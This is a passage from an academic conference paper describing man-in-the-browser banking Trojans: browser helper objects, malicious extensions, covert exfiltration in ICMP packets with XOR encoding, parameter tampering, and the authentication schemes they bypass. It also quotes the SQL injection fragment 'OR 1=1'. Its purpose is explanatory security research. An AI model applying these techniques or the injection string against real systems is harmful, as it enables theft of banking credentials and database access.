Proceedings of the 7th Australian Information Security Management Conference
browser (Blunden, 2009). BHOs leave registry entries under the registry key HKLM\SOFTWARE \Microsoft\ Windows\CurrentVersion\Explorer\Browser Helper Objects. They are written in a variety of programming languages such as C++, used to link IE components to build applications (Microsoft Corporation, 2009). BHOs share a common address space with the browser, and have the greater access to browser resources by enabling a direct reading of browser memory (Louw & Lim, 2008), in order to intercept IE user interactions within the browser process, and store it on a user’s computer. They also have merely achieving unlimited access to all resources of the operating systems, such as network sockets, files, and processes (Raffetseder, Kirda, & Kruegel, 2007).
Lastly, some Internet users may occasionally have heard the ‘unplug’ extension which allows the users to save embedded streaming video content on a webpage, such as YouTube and MySpace, as a video file on a computer (Blum & LeBlanc, 2009).
These extensions are likely to perform malicious activity to capture, modify and steal the customer’s banking information and send it back to the attacker via the Internet control message protocol (ICMP) packets, emails or HTTP POST sessions. The malware encodes the data with a simple XOR swap algorithm before placing it into the data section of an ICMP ping packet, which contains captured encoded sensitive data and bypasses administrators and egress filters. Algorithms such as “OR 1=1” in the text field create true conditions to bypass the logic checks or the authentications (Scambray, Shema, & Sima, 2006). These conditions cause the SQL server to return all records from the particular tables, with the consequence that the attacker may gain full access to one or more databases (Rietta, 2006). The packet masquerades as a legitimate traffic, particularly if the keylogger technology has been associated with the Trojan attack (Oiaga, 2006). A man in the browser attack can simply bypass a public key infrastructure (PKI) security measure (Gühring, 2006), a secure socket layer and a transport layer security (SSL/TLS) protocol encryption (Ollmann, 2009). Trojans are very difficult to detect and remove from the system because the network connection is not being related to the Uniform Resource Locator (URL) (Cronto, 2008) as they run on different layers. In addition to transaction authentication, Trojans can circumvent some standard authentication systems that use the PC as a single channel for transmission data to the server as follows:
Username and password
Transaction authentication number (TAN)/ Indexed transaction authentication number (iTAN)
Secure ID tokens
One time pad tokens
Smartcard and/or class 3 reader authentication with client certificates
Bürgerkarte Security layer
Digital Signatures with smartcards and class 3 readers (Gühring, 2006)
Tampering techniques with browser extension tools This paper will review the two most used browsers such as Firefox and Internet Explorer in more detail. Tampering tools masqueraded themselves as a plug-in that is installed on IE and Firefox and have ability to expose aspects of HTTP/HTTPS sessions on the fly, including headers, forms, and cookies (Scambray et al., 2006). Parameters such as GET/POST/PUT can be manipulated or created to send the value changes to any destination without the customer noticing and still return the intended value back to the customer’s screen (Ollmann, 2009). Some plug-in Trojans can tamper with the GET parameters, which are used to request a page from a server for a customer (Fadia, 2006), bypass any browser restrictions.
112| P a g e